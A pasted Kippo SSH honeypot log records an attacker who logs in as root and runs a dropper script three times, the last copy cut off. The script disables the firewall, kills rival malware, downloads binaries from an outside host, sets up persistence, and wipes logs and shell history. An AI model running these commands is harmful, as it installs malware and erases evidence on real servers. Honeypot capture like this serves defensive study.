
Untitled

a guest
Oct 13th, 2014
  1. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
  2. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
  3. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
  4. 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
  5. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
  6. 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
  7. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
  8. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  9. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  10. apt-get -y install wget
  11. yum -y install wget
  12. chmod 7777 / etc
  13. killall -9 .IptabLes
  14. killall -9 nfsd4
  15. killall -9 profild.key
  16. cd /etc;rm -rf dir fake.cfg
  17. killall -9 nfsd
  18. killall -9 DDosl
  19. killall -9 lengchao32
  20. killall -9 b26
  21. killall -9 khelper
  22. killall -9 Bill
  23. killall -9 n26
  24. killall -9 007
  25. killall -9 codelove
  26. killall -9 32
  27. killall -9 m32
  28. killall -9 m64
  29. killall -9 64
  30. killall -9 83BOT
  31. killall -9 82BOT
  32. killall -9 dos64
  33. killall -9 dos32
  34. killall -9 new6
  35. killall -9 new4
  36. killall -9 node24
  37. killall -9 mimi
  38. killall -9 nodeJR-1
  39. killall -9 freeBSD
  40. killall -9 ksapdd
  41. killall -9 106
  42. killall -9 09
  43. killall -9 xsw
  44. killall -9 syslogd
  45. killall -9 skysapdd
  46. killall -9 cupsddd
  47. killall -9 ksapd
  48. killall -9 atddd
  49. killall -9 xfsdxd
  50. killall -9 sfewfesfs
  51. killall -9 gfhjrtfyhuf
  52. killall -9 rewgtf3er4t
  53. killall -9 fdsfsfvff
  54. killall -9 smarvtd
  55. killall -9 whitptabil
  56. killall -9 gdmorpen
  57. cd /etc;chattr -i 66
  58. cd /root; chmod 7777 / etc
  59. killall -9 minerd
  60. killall -9 syn
  61. killall -9 joudckfr
  62. killall -9 www
  63. killall -9 log
  64. killall -9 .IptabLes
  65. killall -9 .IptabLex
  66. killall -9 .Mm2
  67. killall -9 acpid
  68. killall -9 m64
  69. killall -9 ./QQ
  70. killall -9 aabb
  71. killall -9 g3
  72. killall -9 S99local
  73. killall -9 3
  74. killall -9 pm
  75. killall -9 qweasd
  76. killall -9 tangtang
  77. killall -9 imap-login
  78. killall -9 xudp
  79. killall -9 sshpa
  80. killall -9 008
  81. killall -9 txma
  82. killall -9 mrdos64.b00
  83. killall -9 mrdos32.b00
  84. killall -9 kkpklp
  85. killall -9 kiilp
  86. killall -9 xin1
  87. killall -9 jibateng
  88. killall -9 syscore.sh
  89. killall -9 syscore.sh
  90. killall -9 syscore.sh
  91. killall -9 .mimeo
  92. killall -9 .mimeo
  93. killall -9 .mimeo
  94. killall -9 .mimeop
  95. killall -9 .task1
  96. killall -9 .mimeop
  97. killall -9 .IptabLes
  98. killall -9 .IptabLex
  99. killall -9 .IptabLes
  100. killall -9 .IptabLex
  101. killall -9 .IptabLes
  102. killall -9 .IptabLex
  103. killall -9 .IptabLes
  104. killall -9 .IptabLex
  105. cd /root;rm -rf dir nohup.out
  106. cd /etc;rm -rf dir fake.cfg
  107. cd /etc;rm -rf dir cupsddd.*
  108. cd /etc;rm -rf dir atddd.*
  109. cd /etc;rm -rf dir ksapdd.*
  110. cd /etc;rm -rf dir kysapdd.*
  111. cd /etc;rm -rf dir sksapdd.*
  112. cd /etc;rm -rf dir skysapdd.*
  113. cd /etc;rm -rf dir xfsdxd.*
  114. cd /etc;rm -rf dir fake.cfg
  115. cd /etc;rm -rf dir cupsdd.*
  116. cd /etc;rm -rf dir atdd.*
  117. cd /etc;rm -rf dir ksapd.*
  118. cd /etc;rm -rf dir kysapd.*
  119. cd /etc;rm -rf dir sksapd.*
  120. cd /etc;rm -rf dir skysapd.*
  121. cd /etc;rm -rf dir xfsdx.*
  122. cd /etc;rm -rf dir sfewfesfs
  123. cd /etc;rm -rf dir gfhjrtfyhuf
  124. cd /etc;rm -rf dir rewgtf3er4t
  125. cd /etc;rm -rf dir fdsfsfvff
  126. cd /etc;rm -rf dir smarvtd
  127. cd /etc;rm -rf dir whitptabil
  128. cd /etc;rm -rf dir gdmorpen
  129. cd /etc;rm -rf dir sfewfesfs.*
  130. cd /etc;rm -rf dir gfhjrtfyhuf.*
  131. cd /etc;rm -rf dir rewgtf3er4t.*
  132. cd /etc;rm -rf dir fdsfsfvff.*
  133. cd /etc;rm -rf dir smarvtd.*
  134. cd /etc;rm -rf dir whitptabil.*
  135. cd /etc;rm -rf dir gdmorpen.*
  136. cd /etc;rm -rf dir nhgbhhj.*
  137. cd /tmp;rm -rf dir 1.*
  138. cd /tmp;rm -rf dir 2.*
  139. cd /tmp;rm -rf dir 3.*
  140. cd /tmp;rm -rf dir 4.*
  141. cd /tmp;rm -rf dir 5.*
  142. cd /tmp;rm -rf dir jdhe
  143. cd /tmp;rm -rf dir jdhe.*
  144. cd /var/spool/cron; rm -rf dir root.*
  145. cd /var/spool/cron; rm -rf dir root
  146. cd /var/spool/cron/crontabs; rm -rf dir root.*
  147. cd /var/spool/cron/crontabs; rm -rf dir root
  148. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  149. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  150. yes|mv /tmp/root /var/spool/cron
  151. yes|mv /tmp/root /var/spool/cron/crontabs
  152. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  153. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  154. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  155. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  156. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  157. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  158. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  159. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  160. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  161. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  162. cd /tmp;chmod 7777 jdhe
  163. cd /etc;chmod 7777 nhgbhhj
  164. cd /etc;chmod 7777 byv832
  165. cd /etc;chmod 7777 sfewfesfs
  166. cd /etc;chmod 7777 gfhjrtfyhuf
  167. cd /etc;chmod 7777 rewgtf3er4t
  168. cd /etc;chmod 7777 fdsfsfvff
  169. cd /etc;chmod 7777 smarvtd
  170. cd /etc;chmod 7777 whitptabil
  171. cd /etc;chmod 7777 gdmorpen
  172. cd /tmp;chmod 7777 nhgbhhj
  173. cd /tmp;chmod 7777 byv832
  174. cd /tmp;chmod 7777 sfewfesfs
  175. cd /tmp;chmod 7777 gfhjrtfyhuf
  176. cd /tmp;chmod 7777 rewgtf3er4t
  177. cd /tmp;chmod 7777 fdsfsfvff
  178. cd /tmp;chmod 7777 smarvtd
  179. cd /tmp;chmod 7777 whitptabil
  180. cd /tmp;chmod 7777 gdmorpen
  181. cd /tmp;./jdhe
  182. nohup /etc/sfewfesfs > /dev/null 2>&1&
  183. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  184. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  185. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  186. nohup /etc/smarvtd > /dev/null 2>&1&
  187. nohup /etc/whitptabil > /dev/null 2>&1&
  188. nohup /etc/gdmorpen > /dev/null 2>&1&
  189. nohup /etc/nhgbhhj > /dev/null 2>&1&
  190. nohup /etc/byv832 > /dev/null 2>&1&
  191. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  192. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  193. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  194. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  195. nohup /tmp/smarvtd > /dev/null 2>&1&
  196. nohup /tmp/whitptabil > /dev/null 2>&1&
  197. nohup /tmp/gdmorpen > /dev/null 2>&1&
  198. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  199. nohup /tmp/byv832 > /dev/null 2>&1&
  200. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  201. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  202. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  203. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  204. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  205. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  206. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  207. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  208. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  209. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  210. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  211. echo "cd /etc;./smarvtd" >> /etc/rc.local
  212. echo "cd /etc;./whitptabil" >> /etc/rc.local
  213. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  214. echo "unset MAILCHECK" >> /etc/profile
  215. cd /etc;chattr +i sfewfesfs
  216. rm -rf /root/.bash_history
  217. touch /root/.bash_history
  218. history -r
  219. cd /var/log > dmesg
  220. cd /var/log > auth.log
  221. cd /var/log > alternatives.log
  222. cd /var/log > boot.log
  223. cd /var/log > btmp
  224. cd /var/log > cron
  225. cd /var/log > cups
  226. cd /var/log > daemon.log
  227. cd /var/log > dpkg.log
  228. cd /var/log > faillog
  229. cd /var/log > kern.log
  230. cd /var/log > lastlog
  231. cd /var/log > maillog
  232. cd /var/log > user.log
  233. cd /var/log > Xorg.x.log
  234. cd /var/log > anaconda.log
  235. cd /var/log > yum.log
  236. cd /var/log > secure
  237. cd /var/log > wtmp
  238. cd /var/log > utmp
  239. cd /var/log > messages
  240. cd /var/log > spooler
  241. cd /var/log > sudolog
  242. cd /var/log > aculog
  243. cd /var/log > access-log
  244. cd /root > .bash_history
  245. history -c"
  246. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
  247. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  248. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  249. apt-get -y install wget
  250. yum -y install wget
  251. chmod 7777 / etc
  252. killall -9 .IptabLes
  253. killall -9 nfsd4
  254. killall -9 profild.key
  255. cd /etc;rm -rf dir fake.cfg
  256. killall -9 nfsd
  257. killall -9 DDosl
  258. killall -9 lengchao32
  259. killall -9 b26
  260. killall -9 khelper
  261. killall -9 Bill
  262. killall -9 n26
  263. killall -9 007
  264. killall -9 codelove
  265. killall -9 32
  266. killall -9 m32
  267. killall -9 m64
  268. killall -9 64
  269. killall -9 83BOT
  270. killall -9 82BOT
  271. killall -9 dos64
  272. killall -9 dos32
  273. killall -9 new6
  274. killall -9 new4
  275. killall -9 node24
  276. killall -9 mimi
  277. killall -9 nodeJR-1
  278. killall -9 freeBSD
  279. killall -9 ksapdd
  280. killall -9 106
  281. killall -9 09
  282. killall -9 xsw
  283. killall -9 syslogd
  284. killall -9 skysapdd
  285. killall -9 cupsddd
  286. killall -9 ksapd
  287. killall -9 atddd
  288. killall -9 xfsdxd
  289. killall -9 sfewfesfs
  290. killall -9 gfhjrtfyhuf
  291. killall -9 rewgtf3er4t
  292. killall -9 fdsfsfvff
  293. killall -9 smarvtd
  294. killall -9 whitptabil
  295. killall -9 gdmorpen
  296. cd /etc;chattr -i 66
  297. cd /root; chmod 7777 / etc
  298. killall -9 minerd
  299. killall -9 syn
  300. killall -9 joudckfr
  301. killall -9 www
  302. killall -9 log
  303. killall -9 .IptabLes
  304. killall -9 .IptabLex
  305. killall -9 .Mm2
  306. killall -9 acpid
  307. killall -9 m64
  308. killall -9 ./QQ
  309. killall -9 aabb
  310. killall -9 g3
  311. killall -9 S99local
  312. killall -9 3
  313. killall -9 pm
  314. killall -9 qweasd
  315. killall -9 tangtang
  316. killall -9 imap-login
  317. killall -9 xudp
  318. killall -9 sshpa
  319. killall -9 008
  320. killall -9 txma
  321. killall -9 mrdos64.b00
  322. killall -9 mrdos32.b00
  323. killall -9 kkpklp
  324. killall -9 kiilp
  325. killall -9 xin1
  326. killall -9 jibateng
  327. killall -9 syscore.sh
  328. killall -9 syscore.sh
  329. killall -9 syscore.sh
  330. killall -9 .mimeo
  331. killall -9 .mimeo
  332. killall -9 .mimeo
  333. killall -9 .mimeop
  334. killall -9 .task1
  335. killall -9 .mimeop
  336. killall -9 .IptabLes
  337. killall -9 .IptabLex
  338. killall -9 .IptabLes
  339. killall -9 .IptabLex
  340. killall -9 .IptabLes
  341. killall -9 .IptabLex
  342. killall -9 .IptabLes
  343. killall -9 .IptabLex
  344. cd /root;rm -rf dir nohup.out
  345. cd /etc;rm -rf dir fake.cfg
  346. cd /etc;rm -rf dir cupsddd.*
  347. cd /etc;rm -rf dir atddd.*
  348. cd /etc;rm -rf dir ksapdd.*
  349. cd /etc;rm -rf dir kysapdd.*
  350. cd /etc;rm -rf dir sksapdd.*
  351. cd /etc;rm -rf dir skysapdd.*
  352. cd /etc;rm -rf dir xfsdxd.*
  353. cd /etc;rm -rf dir fake.cfg
  354. cd /etc;rm -rf dir cupsdd.*
  355. cd /etc;rm -rf dir atdd.*
  356. cd /etc;rm -rf dir ksapd.*
  357. cd /etc;rm -rf dir kysapd.*
  358. cd /etc;rm -rf dir sksapd.*
  359. cd /etc;rm -rf dir skysapd.*
  360. cd /etc;rm -rf dir xfsdx.*
  361. cd /etc;rm -rf dir sfewfesfs
  362. cd /etc;rm -rf dir gfhjrtfyhuf
  363. cd /etc;rm -rf dir rewgtf3er4t
  364. cd /etc;rm -rf dir fdsfsfvff
  365. cd /etc;rm -rf dir smarvtd
  366. cd /etc;rm -rf dir whitptabil
  367. cd /etc;rm -rf dir gdmorpen
  368. cd /etc;rm -rf dir sfewfesfs.*
  369. cd /etc;rm -rf dir gfhjrtfyhuf.*
  370. cd /etc;rm -rf dir rewgtf3er4t.*
  371. cd /etc;rm -rf dir fdsfsfvff.*
  372. cd /etc;rm -rf dir smarvtd.*
  373. cd /etc;rm -rf dir whitptabil.*
  374. cd /etc;rm -rf dir gdmorpen.*
  375. cd /etc;rm -rf dir nhgbhhj.*
  376. cd /tmp;rm -rf dir 1.*
  377. cd /tmp;rm -rf dir 2.*
  378. cd /tmp;rm -rf dir 3.*
  379. cd /tmp;rm -rf dir 4.*
  380. cd /tmp;rm -rf dir 5.*
  381. cd /tmp;rm -rf dir jdhe
  382. cd /tmp;rm -rf dir jdhe.*
  383. cd /var/spool/cron; rm -rf dir root.*
  384. cd /var/spool/cron; rm -rf dir root
  385. cd /var/spool/cron/crontabs; rm -rf dir root.*
  386. cd /var/spool/cron/crontabs; rm -rf dir root
  387. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  388. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  389. yes|mv /tmp/root /var/spool/cron
  390. yes|mv /tmp/root /var/spool/cron/crontabs
  391. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  392. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  393. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  394. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  395. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  396. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  397. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  398. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  399. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  400. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  401. cd /tmp;chmod 7777 jdhe
  402. cd /etc;chmod 7777 nhgbhhj
  403. cd /etc;chmod 7777 byv832
  404. cd /etc;chmod 7777 sfewfesfs
  405. cd /etc;chmod 7777 gfhjrtfyhuf
  406. cd /etc;chmod 7777 rewgtf3er4t
  407. cd /etc;chmod 7777 fdsfsfvff
  408. cd /etc;chmod 7777 smarvtd
  409. cd /etc;chmod 7777 whitptabil
  410. cd /etc;chmod 7777 gdmorpen
  411. cd /tmp;chmod 7777 nhgbhhj
  412. cd /tmp;chmod 7777 byv832
  413. cd /tmp;chmod 7777 sfewfesfs
  414. cd /tmp;chmod 7777 gfhjrtfyhuf
  415. cd /tmp;chmod 7777 rewgtf3er4t
  416. cd /tmp;chmod 7777 fdsfsfvff
  417. cd /tmp;chmod 7777 smarvtd
  418. cd /tmp;chmod 7777 whitptabil
  419. cd /tmp;chmod 7777 gdmorpen
  420. cd /tmp;./jdhe
  421. nohup /etc/sfewfesfs > /dev/null 2>&1&
  422. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  423. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  424. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  425. nohup /etc/smarvtd > /dev/null 2>&1&
  426. nohup /etc/whitptabil > /dev/null 2>&1&
  427. nohup /etc/gdmorpen > /dev/null 2>&1&
  428. nohup /etc/nhgbhhj > /dev/null 2>&1&
  429. nohup /etc/byv832 > /dev/null 2>&1&
  430. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  431. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  432. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  433. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  434. nohup /tmp/smarvtd > /dev/null 2>&1&
  435. nohup /tmp/whitptabil > /dev/null 2>&1&
  436. nohup /tmp/gdmorpen > /dev/null 2>&1&
  437. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  438. nohup /tmp/byv832 > /dev/null 2>&1&
  439. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  440. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  441. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  442. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  443. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  444. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  445. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  446. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  447. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  448. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  449. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  450. echo "cd /etc;./smarvtd" >> /etc/rc.local
  451. echo "cd /etc;./whitptabil" >> /etc/rc.local
  452. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  453. echo "unset MAILCHECK" >> /etc/profile
  454. cd /etc;chattr +i sfewfesfs
  455. rm -rf /root/.bash_history
  456. touch /root/.bash_history
  457. history -r
  458. cd /var/log > dmesg
  459. cd /var/log > auth.log
  460. cd /var/log > alternatives.log
  461. cd /var/log > boot.log
  462. cd /var/log > btmp
  463. cd /var/log > cron
  464. cd /var/log > cups
  465. cd /var/log > daemon.log
  466. cd /var/log > dpkg.log
  467. cd /var/log > faillog
  468. cd /var/log > kern.log
  469. cd /var/log > lastlog
  470. cd /var/log > maillog
  471. cd /var/log > user.log
  472. cd /var/log > Xorg.x.log
  473. cd /var/log > anaconda.log
  474. cd /var/log > yum.log
  475. cd /var/log > secure
  476. cd /var/log > wtmp
  477. cd /var/log > utmp
  478. cd /var/log > messages
  479. cd /var/log > spooler
  480. cd /var/log > sudolog
  481. cd /var/log > aculog
  482. cd /var/log > access-log
  483. cd /root > .bash_history
  484. history -c"
  485. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
  486. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
  487. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  488. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  489. apt-get -y install wget
  490. yum -y install wget
  491. chmod 7777 / etc
  492. killall -9 .IptabLes
  493. killall -9 nfsd4
  494. killall -9 profild.key
  495. cd /etc;rm -rf dir fake.cfg
  496. killall -9 nfsd
  497. killall -9 DDosl
  498. killall -9 lengchao32
  499. killall -9 b26
  500. killall -9 khelper
  501. killall -9 Bill
  502. killall -9 n26
  503. killall -9 007
  504. killall -9 codelove
  505. killall -9 32
  506. killall -9 m32
  507. killall -9 m64
  508. killall -9 64
  509. killall -9 83BOT
  510. killall -9 82BOT
  511. killall -9 dos64
  512. killall -9 dos32
  513. killall -9 new6
  514. killall -9 new4
  515. killall -9 node24
  516. killall -9 mimi
  517. killall -9 nodeJR-1
  518. killall -9 freeBSD
  519. killall -9 ksapdd
  520. killall -9 106
  521. killall -9 09
  522. killall -9 xsw
  523. killall -9 syslogd
  524. killall -9 skysapdd
  525. killall -9 cupsddd
  526. killall -9 ksapd
  527. killall -9 atddd
  528. killall -9 xfsdxd
  529. killall -9 sfewfesfs
  530. killall -9 gfhjrtfyhuf
  531. killall -9 rewgtf3er4t
  532. killall -9 fdsfsfvff
  533. killall -9 smarvtd
  534. killall -9 whitptabil
  535. killall -9 gdmorpen
  536. cd /etc;chattr -i 66
  537. cd /root; chmod 7777 / etc
  538. killall -9 minerd
  539. killall -9 syn
  540. killall -9 joudckfr
  541. killall -9 www
  542. killall -9 log
  543. killall -9 .IptabLes
  544. killall -9 .IptabLex
  545. killall -9 .Mm2
  546. killall -9 acpid
  547. killall -9 m64
  548. killall -9 ./QQ
  549. killall -9 aabb
  550. killall -9 g3
  551. killall -9 S99local
  552. killall -9 3
  553. killall -9 pm
  554. killall -9 qweasd
  555. killall -9 tangtang
  556. killall -9 imap-login
  557. killall -9 xudp
  558. killall -9 sshpa
  559. killall -9 008
  560. killall -9 txma
  561. killall -9 mrdos64.b00
  562. killall -9 mrdos32.b00
  563. killall -9 kkpklp
  564. killall -9 kiilp
  565. killall -9 xin1
  566. killall -9 jibateng
  567. killall -9 syscore.sh
  568. killall -9 syscore.sh
  569. killall -9 syscore.sh
  570. killall -9 .mimeo
  571. killall -9 .mimeo
  572. killall -9 .mimeo
  573. killall -9 .mimeop
  574. killall -9 .task1
  575. killall -9 .mimeop
  576. killall -9 .IptabLes
  577. killall -9 .IptabLex
  578. killall -9 .IptabLes
  579. killall -9 .IptabLex
  580. killall -9 .IptabLes
  581. killall -9 .IptabLex
  582. killall -9 .IptabLes
  583. killall -9 .IptabLex
  584. cd /root;rm -rf dir nohup.out
  585. cd /etc;rm -rf dir fake.cfg
  586. cd /etc;rm -rf dir cupsddd.*
  587. cd /etc;rm -rf dir atddd.*
  588. cd /etc;rm -rf dir ksapdd.*
  589. cd /etc;rm -rf dir kysapdd.*
  590. cd /etc;rm -rf dir sksapdd.*
  591. cd /etc;rm -rf dir skysapdd.*
  592. cd /etc;rm -rf dir xfsdxd.*
  593. cd /etc;rm -rf dir fake.cfg
  594. cd /etc;rm -rf dir cupsdd.*
  595. cd /etc;rm -rf dir atdd.*
  596. cd /etc;rm -rf dir ksapd.*
  597. cd /etc;rm -rf dir kysapd.*
  598. cd /etc;rm -rf dir sksapd.*
  599. cd /etc;rm -rf dir skysapd.*
  600. cd /etc;rm -rf dir xfsdx.*
  601. cd /etc;rm -rf dir sfewfesfs
  602. cd /etc;rm -rf dir gfhjrtfyhuf
  603. cd /etc;rm -rf dir rewgtf3er4t
  604. cd /etc;rm -rf dir fdsfsfvff
  605. cd /etc;rm -rf dir smarvtd
  606. cd /etc;rm -rf dir whitptabil
  607. cd /etc;rm -rf dir gdmorpen
  608. cd /etc;rm -rf dir sfewfesfs.*
  609. cd /etc;rm -rf dir gfhjrtfyhuf.*
  610. cd /etc;rm -rf dir rewgtf3er4t.*
  611. cd /etc;rm -rf dir fdsfsfvff.*
  612. cd /etc;rm -rf dir smarvtd.*
  613. cd /etc;rm -rf dir whitptabil.*
  614. cd /etc;rm -rf dir gdmorpen.*
  615. cd /etc;rm -rf dir nhgbhhj.*
  616. cd /tmp;rm -rf dir 1.*
  617. cd /tmp;rm -rf dir 2.*
  618. cd /tmp;rm -rf dir 3.*
  619. cd /tmp;rm -rf dir 4.*
  620. cd /tmp;rm -rf dir 5.*
  621. cd /tmp;rm -rf dir jdhe
  622. cd /tmp;rm -rf dir jdhe.*
  623. cd /var/spool/cron; rm -rf dir root.*
  624. cd /var/spool/cron; rm -rf dir root
  625. cd /var/spool/cron/crontabs; rm -rf dir root.*
  626. cd /var/spool/cron/crontabs; rm -rf dir root
  627. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  628. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  629. yes|mv /tmp/root /var/spool/cron
  630. yes|mv /tmp/root /var/spool/cron/crontabs
  631. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  632. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  633. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  634. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  635. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  636. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  637. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  638. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  639. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  640. cd /etc;wget -c http://www.frade8c.com:9162/byv832
  641. cd /tmp;chmod 7777 jdhe
  642. cd /etc;chmod 7777 nhgbhhj
  643. cd /etc;chmod 7777 byv832
  644. cd /etc;chmod 7777 sfewfesfs
  645. cd /etc;chmod 7777 gfhjrtfyhuf
  646. cd /etc;chmod 7777 rewgtf3er4t
  647. cd /etc;chmod 7777 fdsfsfvff
  648. cd /etc;chmod 7777 smarvtd
  649. cd /etc;chmod 7777 whitptabil
  650. cd /etc;chmod 7777 gdmorpen
  651. cd /tmp;chmod 7777 nhgbhhj
  652. cd /tmp;chmod 7777 byv832
  653. cd /tmp;chmod 7777 sfewfesfs
  654. cd /tmp;chmod 7777 gfhjrtfyhuf
  655. cd /tmp;chmod 7777 rewgtf3er4t
  656. cd /tmp;chmod 7777 fdsfsfvff
  657. cd /tmp;chmod 7777 smarvtd
  658. cd /tmp;chmod 7777 whitptabil
  659. cd /tmp;chmod 7777 gdmorpen
  660. cd /tmp;./jdhe
  661. nohup /etc/sfewfesfs > /dev/null 2>&1&
  662. nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  663. nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  664. nohup /etc/fdsfsfvff > /dev/null 2>&1&
  665. nohup /etc/smarvtd > /dev/null 2>&1&
  666. nohup /etc/whitptabil > /dev/null 2>&1&
  667. nohup /etc/gdmorpen > /dev/null 2>&1&
  668. nohup /etc/nhgbhhj > /dev/null 2>&1&
  669. nohup /etc/byv832 > /dev/null 2>&1&
  670. nohup /tmp/sfewfesfs > /dev/null 2>&1&
  671. nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  672. nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  673. nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  674. nohup /tmp/smarvtd > /dev/null 2>&1&
  675. nohup /tmp/whitptabil > /dev/null 2>&1&
  676. nohup /tmp/gdmorpen > /dev/null 2>&1&
  677. nohup /tmp/nhgbhhj > /dev/null 2>&1&
  678. nohup /tmp/byv832 > /dev/null 2>&1&
  679. echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  680. echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  681. echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  682. echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  683. echo "cd /tmp;./smarvtd" >> /etc/rc.local
  684. echo "cd /tmp;./whitptabil" >> /etc/rc.local
  685. echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  686. echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  687. echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  688. echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  689. echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  690. echo "cd /etc;./smarvtd" >> /etc/rc.local
  691. echo "cd /etc;./whitptabil" >> /etc/rc.local
  692. echo "cd /etc;./gdmorpen" >> /etc/rc.local
  693. echo "unset MAILCHECK" >> /etc/profile
  694. cd /etc;chattr +i sfewfesfs
  695. rm -rf /root/.bash_history
  696. touch /root/.bash_history
  697. history -r
  698. cd /var/log > dmesg
  699. cd /var/log > auth.log
  700. cd /var/log > alternatives.log
  701. cd /var/log > boot.log
  702. cd /var/log > btmp
  703. cd /var/log > cron
  704. cd /var/log > cups
  705. cd /var/log > daemon.log
  706. cd /var/log > dpkg.log
  707. cd /var/log > faillog
  708. cd /var/log > kern.log
  709. cd /var/log > lastlog
  710. cd /var/log > maillog
  711. cd /var/log > user.log
  712. cd /var/log > Xorg.x.log
